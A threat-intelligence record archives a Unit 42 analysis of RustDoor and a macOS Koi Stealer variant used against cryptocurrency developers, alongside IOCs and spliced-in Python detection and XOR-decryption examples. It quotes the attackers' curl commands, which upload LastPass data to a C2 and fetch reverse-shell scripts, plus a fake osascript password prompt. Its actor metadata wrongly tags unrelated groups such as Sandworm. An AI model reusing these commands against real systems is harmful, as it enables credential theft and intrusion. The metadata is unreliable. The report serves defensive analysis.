{
	"id": "be746589-8dd0-49f0-9c3e-050620f30d43",
	"created_at": "2026-04-06T00:10:48.604288Z",
	"updated_at": "2026-04-10T03:37:08.585485Z",
	"deleted_at": null,
	"sha1_hash": "781a1574a9f8bf669ba2f775f05296595e0033a3",
	"title": "RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 737474,
	"plain_text": "RustDoor and Koi Stealer for macOS Used by North Korea-Linked\r\nThreat Actor to Target the Cryptocurrency Sector\r\nBy Adva Gabay, Daniel Frank\r\nPublished: 2025-02-26 · Archived: 2026-04-05 15:25:42 UTC\r\nExecutive Summary\r\nMalware targeting macOS systems is increasingly pervasive in our current threat landscape. Most of the\r\nassociated threats are cybercrime-related, ranging from information stealers to cryptocurrency mining. Over the\r\npast year, we have witnessed an increase in cybercrime activity linked to North Korean nation-state APT groups.\r\nIn line with the public service announcement issued by the FBI regarding North Korean social engineering\r\nattacks, we have also witnessed several such social engineering attempts, targeting job-seeking software\r\ndevelopers in the cryptocurrency sector.\r\nIn this campaign, we discovered a Rust-based macOS malware nicknamed RustDoor masquerading as a legitimate\r\nsoftware update, as well as a previously undocumented macOS variant of a malware family known as Koi Stealer.\r\nDuring our investigation, we observed rare evasion techniques, namely, manipulating components of macOS to\r\nremain under the radar.\r\nThe characteristics of these attackers are similar to various reports during the past year of North Korean threat\r\nactors targeting other job seekers. We assess with a moderate level of confidence that this attack was carried out\r\non behalf of the North Korean regime.\r\nThis article details the activity of attackers within compromised environments. 
It also provides a technical analysis\r\nof the newly discovered Koi Stealer macOS variant and depicts the different stages of the attack through the lens\r\nof Cortex XDR.\r\nPalo Alto Networks customers are better protected against the RustDoor and Koi Stealer malware presented in this\r\nresearch through the following products and services:\r\nCortex XDR and XSIAM\r\nCloud-Delivered Security Services for the Next-Generation Firewall, such as Advanced WildFire,\r\nAdvanced DNS Security and Advanced URL Filtering.\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nThe Campaign’s Infection Vector\r\nThis campaign’s infection vector bears similarities to previous research.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 1 of 15\n\nWe have tracked activity from suspected North Korean threat actors in a campaign we track as CL-STA-240 and\r\ncall Contagious Interview. In this campaign, attackers pose as recruiters or prospective employers and ask\r\npotential victims to install malware masquerading as legitimate development software as part of the vetting\r\nprocess. These attacks generally target job seekers in the tech industry and likely occur through email, messaging\r\nplatforms or other online interview methods. While our research into this current activity reveals similarities with\r\nContagious Interview, we did observe distinct tactics, techniques and procedures (TTPs) that cause us to consider\r\nthis a separate campaign.\r\nRecent research from Jamf Threat Labs describes a similar attack method, this time using a malicious Visual\r\nStudio project challenge named “SlackToCSV” to target job-seeking software developers.\r\nIn our research, we found forensic evidence of a similar malicious Visual Studio project in addition to other\r\nmalicious projects. 
Moreover, one of the RustDoor samples, the file named .zsh_env, had the same hash\r\nas the ThiefBucket sample noted by Jamf Threat Labs. However, we found different command and control (C2)\r\nservers for other samples we encountered during our research.\r\nExecution and Download of Malware\r\nWhen examining attacker activity on the infected endpoints, we noticed their persistent nature, as attackers\r\nattempted to execute several different malware variants. When these attempts were prevented by Cortex XDR, the\r\nattackers tried redeploying and executing additional malware to evade detection. Analyzing one of these attacks,\r\nwe can divide it into three distinct stages:\r\nAttempting to execute two RustDoor variants\r\nTrying an additional RustDoor variant and attempting a reverse shell\r\nRunning a previously undocumented macOS Koi Stealer variant\r\nWe describe these phases in the following sections, starting with the initial attempt to execute two RustDoor\r\nvariants.\r\nAttempting to Execute Two RustDoor Binaries\r\nInitially, when executing the fake job interview project within Visual Studio, the malicious code attempts to\r\ndownload and execute two separate Mach-O binaries of RustDoor. Figure 1 shows the names and locations of\r\nthese Mach-O files from a Cortex XDR alert blocking the activity.\r\nThe paths of the RustDoor files are:\r\n/Users/$USER$/.zsh_env\r\n/Users/$USER$/Library/VisualStudioHelper\r\nFigure 1. RustDoor malware locations from the Cortex XDR alert blocking the activity.\r\nAn Additional RustDoor Binary and Attempting to Open a Reverse Shell\r\nAfter the first two RustDoor binaries’ executions were prevented, the attackers executed another sample of\r\nRustDoor. 
The malware then attempted to steal sensitive data such as passwords from the LastPass Google\r\nChrome extension, exfiltrate data to its C2 server and download two additional bash scripts. These bash scripts are\r\nintended to open a reverse shell connection with the attackers.\r\nFigure 2 shows the different commands executed by this RustDoor binary.\r\nFigure 2. The execution and commands of the second RustDoor binary.\r\nTable 1 lists the command lines from Figure 2 with a description of each.\r\nCommand line: curl -O -s hxxps://apple-ads-metric[.]com/npm\r\nDescription: Download RustDoor (saved under the innocuous file name npm)\r\nCommand line: chflags hidden npm\r\nDescription: Set the hidden file flag on the RustDoor binary so that Finder does not display it\r\nCommand line: chmod +x npm\r\nDescription: Grant RustDoor execution permissions\r\nCommand line: log stream --predicate eventMessage contains \"com.apple.restartInitiated\" or eventMessage contains \"com.apple.shutdownInitiated\" --info\r\nDescription: Watch the unified log for shutdown and restart events\r\nCommand line: zsh -c zip -r [redacted].zip /Users/$USER$/Library/Application\\ Support/Google/Chrome/Default/Local\\ Extension\\ Settings/aeblfdkhhhdcdjpifhhbdiojplfjncoa\r\nDescription: Archive the local extension storage of the LastPass extension for Google Chrome (extension ID aeblfdkhhhdcdjpifhhbdiojplfjncoa) in order to steal LastPass data\r\nCommand line: zsh -c curl -F file=[redacted].zip hxxps://visualstudiomacupdate[.]com/tasks/upload_file\r\nDescription: Data exfiltration attempt (multipart upload of the archive to the RustDoor C2 server)\r\nCommand line: zsh -c curl -O -s hxxps://apple-ads-metric[.]com/back.sh\r\nDescription: Download reverse shell script No. 1\r\nCommand line: zsh -c curl -O -s hxxps://apple-ads-metric[.]com/sh.sh && chmod +x sh.sh\r\nDescription: Download reverse shell script No. 2 and grant it execution permissions\r\nCommand line: zsh -c mdfind -name .pem\r\nDescription: Use Spotlight to search the file system for .pem files, which commonly hold certificates and private keys\r\nTable 1. The command lines executed by RustDoor and their description.\r\nFigure 3 shows a Cortex XDR alert blocking attempts at reverse shell execution by both shell scripts to a C2\r\nserver at 31.41.244[.]92 over TCP port 443.\r\nFigure 3. 
The two reverse shell execution attempts to 31.41.244[.]92 prevented by Cortex XDR.\r\nThe IP address the reverse shells attempted to connect to (31.41.244[.]92) has a history of malicious\r\nuse since at least 2022, and it was previously associated with RedLine Stealer.\r\nExecuting a Previously Undocumented macOS Koi Stealer Variant\r\nThe attackers downloaded and executed a final payload that we have identified as a previously undocumented\r\nvariant of Koi Stealer malware. This Koi Stealer sample masqueraded as a Visual Studio update, which prompted\r\nthe user to install it and grant it administrator access.\r\nFigure 4 shows the execution process as detected in Cortex XDR.\r\nFigure 4. macOS Koi Stealer variant download as detected by Cortex XDR.\r\nTable 2 lists the command lines from Figure 4 with a description of each,\r\nexcluding commands similar to those described in Table 1.\r\nCommand line: sh -c tccutil reset AppleEvents\r\nDescription: Reset the TCC (Transparency, Consent and Control) permissions for Apple Events (Automation), so that any earlier user decision about AppleScript control of other apps is discarded and a later request is prompted afresh\r\nCommand line: sh -c ps aux\r\nDescription: List running processes\r\nCommand line: sh -c system_profiler SPHardwareDataType\r\nDescription: Retrieve detailed information about the device’s hardware\r\nCommand line: sh -c osascript<<EOD\r\ndisplay dialog \"Visual Studio requires permission to install update.\r\nPlease enter password for [redacted]:\" default answer \"\" with title \"Visual Studio\" with icon POSIX file \"/Users/$USER$/vs.png\" with hidden answer\r\nEOD\r\nDescription: Display a Visual Studio-branded dialog with a hidden-input password prompt; because it is generated with osascript, this is a plain AppleScript dialog, not a system authentication prompt\r\nCommand line: sh -c sw_vers\r\nDescription: Retrieve the macOS software version\r\nTable 2. The command lines executed by Koi Stealer and their description.\r\nTechnical Analysis of the macOS Koi Stealer Variant\r\nThe Koi Stealer malware is an infostealer that retrieves sensitive data from compromised devices in two phases\r\nand sends it back to the C2 server. 
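The command lines in Tables 1 and 2 above, turned into detection logic as an added example (this is not Cortex XDR content or code from the report): a small Python classifier that tags process-execution log lines with the behaviors the tables describe and runs over constructed sample lines. The log lines, the field layout and the tag names are my own; the LastPass extension ID, the tool names and the defanged domains are taken from the tables.\r\n

```python
# Added example, not code from the Unit 42 report or from Cortex XDR: tags
# process-execution log lines with the behaviors listed in Tables 1 and 2.
# Extension ID, tool names and defanged domains come from the report; the log
# lines, tag names and rules below are my own constructions.
LASTPASS_EXT_ID = 'aeblfdkhhhdcdjpifhhbdiojplfjncoa'  # LastPass for Chrome (Table 1)


def classify_command(cmdline: str) -> list:
    # Return the list of behavior tags that match one command line.
    c = cmdline.lower()
    tokens = c.split()
    tags = []
    if 'chflags hidden' in c:
        tags.append('hidden-file-flag')           # hide the dropped binary from Finder
    if 'curl' in c and '-o' in tokens and 'chmod +x' in c:
        tags.append('download-and-mark-executable')
    if 'zip' in c and (LASTPASS_EXT_ID in c or 'local extension settings' in c):
        tags.append('browser-extension-data-archived')
    if 'curl' in c and '-f file=' in c:
        tags.append('multipart-file-upload')      # curl -F file=... to the C2
    if 'log stream' in c and ('shutdowninitiated' in c or 'restartinitiated' in c):
        tags.append('shutdown-event-monitoring')
    if 'mdfind' in c and '.pem' in c:
        tags.append('key-material-search')
    if 'tccutil reset appleevents' in c:
        tags.append('tcc-appleevents-reset')
    if 'osascript' in c and 'display dialog' in c and 'hidden answer' in c:
        tags.append('password-prompt-dialog')     # fake credential prompt
    if any(r in c for r in ('system_profiler sphardwaredatatype', 'sw_vers', 'ps aux')):
        tags.append('host-recon')
    return tags


def scan_log(lines) -> list:
    # Return (line, tags) for every line that matched at least one rule.
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        tags = classify_command(line)
        if tags:
            hits.append((line, tags))
    return hits


# Constructed sample log (command-line field only). Real telemetry would
# carry undefanged URLs; hxxps and [.] are kept here as in the report.
SAMPLE_LOG = [
    'zsh -c curl -O -s hxxps://apple-ads-metric[.]com/sh.sh && chmod +x sh.sh',
    'chflags hidden npm',
    'zsh -c zip -r out.zip /Users/dev/Library/Application Support/Google/Chrome/Default/Local Extension Settings/' + LASTPASS_EXT_ID,
    'zsh -c curl -F file=out.zip hxxps://visualstudiomacupdate[.]com/tasks/upload_file',
    'log stream --predicate eventMessage contains com.apple.restartInitiated --info',
    'zsh -c mdfind -name .pem',
    'sh -c tccutil reset AppleEvents',
    'sh -c osascript <<EOD display dialog Visual Studio requires permission to install update default answer with hidden answer EOD',
    'sh -c system_profiler SPHardwareDataType',
    'git status',                                  # benign
    'curl -o page.html https://example.com/',      # benign download, no chmod
    'zip -r backup.zip /Users/dev/Documents',      # benign archive
]

if __name__ == '__main__':
    for line, tags in scan_log(SAMPLE_LOG):
        print(', '.join(tags), '<-', line)
```

The recon tag (sw_vers, ps aux, system_profiler) is noisy on its own and is included so that an analyst can correlate it with the higher-signal tags from the same process tree (the fake password dialog, the TCC reset, the extension archive and the multipart upload); in production, alert on the combination rather than on any single line.\r\n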
Similar to the latest Windows variant, the macOS variant is\r\nheavily focused on stealing different cryptocurrency wallets. The full list can be found in Appendix C.\r\nThe section below details key features of the Koi Stealer macOS malware and compares the sample's macOS\r\nfunctionality with its Windows counterpart.\r\nMain Capabilities\r\nData Collection and Exfiltration\r\nStage 1\r\nInitially, Koi Stealer collects reconnaissance information from the infected machine, such as the hardware\r\nUniversally Unique Identifier (UUID) and information about the current user.\r\nSince this Koi Stealer sample impersonates Visual Studio, potential victims may be less suspicious when the app requests\r\nan administrator password, as shown below in Figure 5. The RustDoor variant operates in a similar way.\r\nFigure 5. macOS Koi Stealer variant pop-up asking for the root password.\r\nThis pop-up remains until the user enters the correct password, i.e., the malware checks the entered password rather than accepting any input. After retrieving the\r\nuser’s password and UUID, the malware decodes the C2 URL and forwards these three pieces of information to its\r\nmain function.\r\nFigure 6 displays decompiled code from the malware. The instructions show these three functions and the URL\r\nfor sending the stolen data to the malware's C2 server.\r\nFigure 6. Decompiled code from the macOS Koi Stealer variant showing initial activity.\r\nThe main function begins by generating two random keys, which the malware uses later to encrypt the data that it\r\nwill send to the C2 server. 
The malware then proceeds to build an initial HTTP request that exfiltrates the\r\nfollowing information:\r\nThe current user’s username and password\r\nHostname\r\nBuild information\r\nHardware details\r\nProcess list\r\nInstalled applications\r\nStage 2\r\nAfter the first stage is complete, the malware moves to its second stage of data gathering and exfiltration. During\r\nthis phase, it copies multiple files of interest from the infected machine, including:\r\nBrowser files (under $HOME/Library/Application Support)\r\nFileZilla files (recentservers.xml and sitemanager.xml)\r\nOpenVPN profile files\r\nSteam user and configuration files\r\nCryptocurrency wallets (under $HOME/Library/Application Support)\r\nDiscord user and configuration files\r\nTelegram data files\r\nzsh history\r\nSSH configuration files (under $HOME/.ssh)\r\nKeychain files (under $HOME/Library/Keychains; the login keychain is encrypted with the user's login password, which the malware has already phished in stage 1)\r\nNotes (under $HOME/Library/Containers/com.apple.Notes/Data/Library/Notes)\r\nSafari files (under $HOME/Library/Containers/com.apple.Safari/Data/Library/Cookies)\r\nUse of AppleScript by the Malware\r\nMuting the System to Operate in Maximum Stealth\r\nThis malware uses AppleScript to mute the system’s volume. It likely does this to conceal the subsequent commands\r\nthat copy multiple files, which could otherwise produce an audible notification sound.\r\nAfter executing the exfiltration commands, the malware restores the audio using the same technique. The malware\r\nuses the following AppleScript commands for muting and unmuting the system volume:\r\nset volume output muted true\r\nset volume output muted false\r\nCollecting Specific Files of Interest\r\nLater in its execution flow, the malware uses AppleScript again for a different purpose, to collect specific files and\r\ncopy them from multiple locations to a temporary directory. 
These files are part of the stage 2 stolen information\r\nsent to the C2 server.\r\nThis time, the malware focuses on all the files located in the user’s ~/Desktop and ~/Documents directories,\r\nfiltered by selected extensions. The attacker likely uses AppleScript in this manner in an attempt to remain\r\nundetected.\r\nFigure 7 shows the corresponding code, and the full list of extensions can also be found in Appendix C.\r\nFigure 7. macOS Koi Stealer’s code responsible for stealing files with specific extensions.\r\nStrings Encryption\r\nKoi Stealer’s strings are decrypted at runtime by a single function that is called numerous times throughout the\r\nbinary. In this sample, the decryption function iterates through each character of a 34-character hard-coded key\r\n(xRdEh3f6g1qxTxsCfg1d30W66JuUgQvVti), from index 0 to 33, XORing each key character with the\r\ncharacter at the same position in the encrypted string.\r\nDuring our research, we developed a program that implements the same logic, allowing us to decrypt the strings\r\nand better understand the malware’s functionality. Figure 8 shows the decryption function code from the malware.\r\nAppendix C lists notable decrypted strings.\r\nFigure 8. macOS Koi Stealer variant strings decryption routine.\r\nSimilarities With the Windows Koi Stealer Variant\r\nDuring our research, we found multiple similarities with a previous sample we have determined to be a Windows\r\nvariant of Koi Stealer (SHA256: 2b8c057cf071bcd548d23bc7d73b4a90745e3ff22e5cddcc71fa34ecbf76a8b5). In\r\nthis section we detail the most notable ones, demonstrating the strong resemblance between the two.\r\nHTTP Packet Structure and Sending Memory Streams\r\nIn both cases, the malware developers used similar string formats for transmitting and receiving requests from the C2\r\nserver. 
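The strings decryption routine described under Strings Encryption above, as an added example that is not the Unit 42 authors' decryption program and not code from the sample: a re-implementation of the XOR loop with the key quoted in the report. It assumes, which the report does not state, that the key repeats for strings longer than 34 bytes, and the encrypted inputs it decrypts are constructed for the example rather than taken from the binary.\r\n

```python
# Added example (not the Unit 42 authors' decryption tool): re-implements the
# Koi Stealer macOS string decryption routine described in the report.
# The key is the one quoted in the report. Assumption (mine, not stated in the
# report, which only describes key indices 0..33): the key repeats for inputs
# longer than 34 bytes.
KEY = b'xRdEh3f6g1qxTxsCfg1d30W66JuUgQvVti'


def xor_with_key(data: bytes) -> bytes:
    # Byte i of the input is XORed with byte (i mod 34) of the key.
    # XOR is its own inverse, so this both encrypts and decrypts.
    return bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(data))


def decrypt_string(blob: bytes) -> str:
    # Decrypt one encrypted string as stored in the binary and decode it.
    return xor_with_key(blob).decode('utf-8', errors='replace')


def looks_like_text(s: str) -> bool:
    # Keep results that are entirely printable ASCII; a wrong key or a
    # non-string blob usually produces control or non-ASCII bytes.
    return len(s) > 0 and all(32 <= ord(ch) < 127 for ch in s)


def recover_strings(blobs) -> list:
    # Decrypt a batch of encrypted blobs (for instance the arguments passed to
    # the decryption function, collected from decompiler cross-references) and
    # return only the ones that decrypt to readable text.
    out = []
    for blob in blobs:
        s = decrypt_string(blob)
        if looks_like_text(s):
            out.append(s)
    return out


# Constructed sample inputs for this example, not blobs taken from the sample:
# the first is 'ps aux' (a command from Table 2) XORed with the key by hand,
# the second and third are built with the same routine; the third is longer
# than the key to exercise the repeat assumption, the fourth is junk.
SAMPLE_BLOBS = [
    bytes.fromhex('082144241d4b'),
    xor_with_key(b'set volume output muted true'),
    xor_with_key(b'~/Library/Application Support/Telegram Desktop/tdata'),
    bytes.fromhex('00ff10'),  # decrypts to non-printable bytes and is filtered out
]

if __name__ == '__main__':
    for s in recover_strings(SAMPLE_BLOBS):
        print(s)
```

Feeding it the encrypted blobs collected from cross-references to the decryption function in a disassembler reproduces the strings listed in Appendix C; because XOR is its own inverse, the same routine also encrypts, which is how the constructed inputs above were produced.\r\n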
However, the hard-coded strings differ between the two variants.\r\nIn both variants, the strings are formatted as follows: BASECFG|<hardware UUID>|I1StYPe4|{encrypted host\r\ninformation}.\r\nFigures 9 and 10 show the string formats in code from both the macOS and Windows variants.\r\nFigure 9. macOS Koi Stealer variant HTTP request string format.\r\nFigure 10. Windows Koi Stealer variant HTTP request string format.\r\nMoreover, both variants send memory streams of data directly to the C2 server, which avoids writing that\r\ninformation to disk, where it could be detected.\r\nCode Flow and Data Theft\r\nWhen analyzing the code structure and general execution flow in both variants, we noticed multiple similarities.\r\nFor example, they share an interest in similar sensitive data, and the general code flow of both consists of\r\nencapsulating each stolen data type in a separate function.\r\nIn addition to the typical data that infostealers usually steal, both samples also focus on unusual paths, such as the\r\nconfigurations for Steam and Discord. Figures 11 and 12 show the code responsible for stealing data in the two\r\nvariants.\r\nFigure 11. macOS Koi Stealer variant data theft functions.\r\nFigure 12. Windows Koi Stealer variant data theft functions.\r\nPotential Connection to North Korean Affiliated Activity\r\nAt the time of writing this article, it remains unclear which of the North Korean APT groups or sub-groups are\r\nbehind this operation. However, we can link this activity to known North Korean operations, based on the\r\nfollowing:\r\nTool set: The attackers used the RustDoor backdoor that SentinelOne previously attributed to the North\r\nKorean threat actor we track as Alluring Pisces (aka BlueNoroff, Sapphire Sleet). 
It is unclear, however,\r\nwhether this tool is unique to the group or whether other North Korean APT groups also use it.\r\nInfrastructure: The domain apple-ads-metric[.]com hosts both RustDoor and the macOS variant of Koi\r\nStealer, as noted previously in Table 1 and Figure 4.\r\nVictimology: We observed that the victims were all software developers within the cryptocurrency industry.\r\nThe targeting in this campaign is also consistent with the FBI public service announcement we\r\nmentioned earlier in this article.\r\nConsidering all of the above, we assess with a moderate level of confidence that this attack was carried out on\r\nbehalf of the North Korean regime.\r\nConclusion\r\nIn this article, we reviewed a campaign we believe is linked to North Korean threat actors. The campaign includes\r\na previously undocumented macOS variant of malware known as Koi Stealer. We analyzed how attackers\r\ndelivered and used it to try to gather sensitive data and cryptocurrency wallets from compromised endpoints. We\r\nreviewed the modus operandi of this campaign and discussed the possible ties this campaign has with North\r\nKorean threat actors.\r\nWe also detailed the persistent nature of the attackers, who deployed different tools as their previous attempts were\r\ndetected and prevented by Cortex XDR.\r\nFinally, this campaign highlights the risks organizations worldwide face from elaborate social engineering attacks\r\ndesigned to infiltrate networks and steal sensitive data and cryptocurrencies. 
These risks are magnified when the\r\nperpetrator is a nation-state threat actor, compared to a purely financially motivated cybercriminal.\r\nWe encourage organizations to implement a proactive and multilayered approach when facing such threats and\r\nto invest in social engineering awareness training.\r\nProtections and Mitigations\r\nFor Palo Alto Networks customers, our products and services provide the following coverage associated with this\r\ngroup:\r\nAdvanced WildFire cloud-delivered malware analysis service accurately identifies the known samples as\r\nmalicious.\r\nAdvanced URL Filtering and Advanced DNS Security identify domains associated with this group as\r\nmalicious.\r\nCortex XDR and XSIAM are designed to:\r\nPrevent the execution of known and unknown malware using Behavioral Threat Protection and\r\nmachine learning in the Local Analysis module\r\nProtect against attacks using macOS malware, including those mentioned in this article, through the new\r\nmacOS Analytics module\r\nDetect user and credential-based threats by analyzing anomalous user activity from multiple data\r\nsources\r\nThe new Cortex XDR macOS Analytics module provides enhanced behavioral detection capabilities\r\nagainst complex threats targeting macOS users.\r\nIf you think you might have been impacted or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)\r\nUK: +44.20.3743.3660\r\nEurope and Middle East: +31.20.299.3130\r\nAsia: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nAustralia: +61.2.4062.7950\r\nIndia: 00080005045107\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance (CTA) members. 
CTA members use this intelligence to rapidly deploy protections to\r\ntheir customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat\r\nAlliance.\r\nAppendix A\r\nDetection With the Cortex XDR macOS Analytics Module\r\nThe new Cortex XDR macOS Analytics module provides enhanced behavioral detection capabilities against\r\ncomplex threats targeting macOS users. In the incidents described above, several rules were triggered by\r\nmalicious activity originating from infected endpoints. Figure A1 below depicts alerts that were triggered due to\r\nsuspicious unauthorized browser credentials access and an attempt to open a reverse shell.\r\nFigure A1. Unusual access to browser credentials alert as seen in Cortex XDR.\r\nAppendix B\r\nIndicators of Compromise\r\nRustDoor Variants\r\n.zsh_env\r\nFAT: a900ec81363358ef26bcdf7827f6091af44c3f1001bc8f52b766c9569b56faa5\r\nx64: baa676b671e771bf04b245e648f49516b338e1f49cbd9b4d237cc36d57ab858d\r\nARM: 76f96a35b6f638eed779dc127f29a5b537ffc3bb7accc2c9bfab5a2120ea6bc9\r\nMalicious Files Impersonating Visual Studio Helper\r\nFAT: adde2970b40634e91b9ef8520f8e50eaa7901a65f9230e65d7995ac1a47700ef\r\nx64: c379f4ab29a49d4bccb232c8551d1b8b01e64440ea495bbabef9010a519516c3\r\nARM: a5b7ddd12539ce3e8c08bed5855ddcea3217d41d7d4c58fcc1a7e01336b38912\r\nNPM No. 1\r\nFAT: b5412375477a180608bf410f5cb36b4a0949bee7663648a06879f42be9a3b6bc\r\nx64: b5119a49830a2044f406645c261e54ab335c9b1e1ed320df758405a8147fae88\r\nARM: 17064520feaf5804aa725e123b24fd0f73f8afc9b7f4361650cd11ddf4ee768f\r\nNPM No. 
2\r\nFAT: 8be62324fe5af009c12fb9afc8d4f47d12c98ea680bff490b3f5e0c72c8f9617\r\nx64: 77361f7ef25a0185636a0fc6deff2e9986720223da9d6b1494f671082105bebb\r\nARM: 27fcc3278afbbec44737e9f72666946607fea819f5b1cb9fbbe268037a561f0b\r\nKoi Stealer macOS Variant\r\nFAT: 97abafff549ea21797c135c965c5e4a46a44ec7353b2edd293e8a22d5954b6aa\r\nx64: c42b103b42d7e9817f93cb66716b7bf2e4fe73a405e0fbbae0806ce8b248a304\r\nARM: 8f0e2b8b3e07f5761066cb00bc0db10d68c56ada8c054e9f07990cc1ac5ae962\r\nMalware downloads domain\r\nhxxps://apple-ads-metric[.]com\r\nRustDoor C2 domain\r\nhxxps://visualstudiomacupdate[.]com\r\nmacOS Koi Stealer C2 IP address\r\n5.255.101[.]148\r\nReverse shell IP address\r\n31.41.244[.]92\r\nStrings encryption key\r\nxRdEh3f6g1qxTxsCfg1d30W66JuUgQvVti\r\nAppendix C: Notable Decrypted Strings\r\nKoi Stealer macOS Variant Targeted Cryptocurrency Wallets List\r\nAtomic\r\nBitPay\r\nBitcoin\r\nBlockstream\r\nCoinomi\r\nDaedalus\r\nDashCore\r\nDigiByte\r\nDogecoin\r\nElectronCash\r\nElectrum\r\nEthereum\r\nExodus\r\nGuarda\r\nJaxx\r\nLedger\r\nMonero\r\nMyMonero\r\nRavecoin\r\nKoi Stealer macOS Variant File Extensions of Interest\r\nAsc\r\nConf\r\nDat\r\nDoc\r\nDocx\r\nJpg\r\nJson\r\nKdbx\r\nKey\r\nOvpn\r\nPdf\r\nPem\r\nPpk\r\nRdp\r\nRtf\r\nSql\r\nTxt\r\nWallet\r\nXls\r\nXlsx\r\nKoi Stealer macOS Variant Targeted Browsers List\r\nBrave\r\nChrome\r\nChromium\r\nCocCoc\r\nEdge\r\nFirefox\r\nOpera\r\nOpera GX\r\nThunderbird (email application)\r\nVivaldi\r\nWaterfox\r\nKoi Stealer macOS Variant Targeted Directories\r\n~/Desktop\r\n~/Documents\r\n~/Library/Containers/com.apple.Notes/Data/Library/Notes\r\n~/Library/Keychains\r\n~/.config/filezilla\r\n~/Library/Application Support/OpenVPN Connect/profiles\r\n~/Library/Application Support/Steam/config\r\n~/Library/Application Support/discord/Local 
Storage\r\n~/Library/Application Support/Telegram Desktop/tdata\r\nAdditional Resources\r\nNew macOS Backdoor Written in Rust Shows Possible Link with Windows Ransomware Group –\r\nBitdefender\r\nRustDoor and GateDoor: A New Pair of Weapons Disguised as Legitimate Software by Suspected\r\nCybercriminal – S2W Blog on Medium\r\nJamf Threat Labs observes targeted attacks amid FBI Warnings – Jamf Threat Labs\r\nUpdates from the MaaS: new threats delivered through NullMixer – L M on Medium\r\nKoi Loader malware hidden in signed installation files – An Xin Threat Intelligence Center, Security\r\nInsider\r\nContagious Interview research by Unit 42 – Unit 42, Palo Alto Networks\r\nSource: https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/"
	],
	"report_names": [
		"macos-malware-targets-crypto-sector"
	],
	"threat_actors": [
		{
			"id": "810fada6-3a62-477e-ac11-2702f9a1ef80",
			"created_at": "2023-01-06T13:46:38.874104Z",
			"updated_at": "2026-04-10T02:00:03.129286Z",
			"deleted_at": null,
			"main_name": "STARDUST CHOLLIMA",
			"aliases": [
				"Sapphire Sleet"
			],
			"source_name": "MISPGALAXY:STARDUST CHOLLIMA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
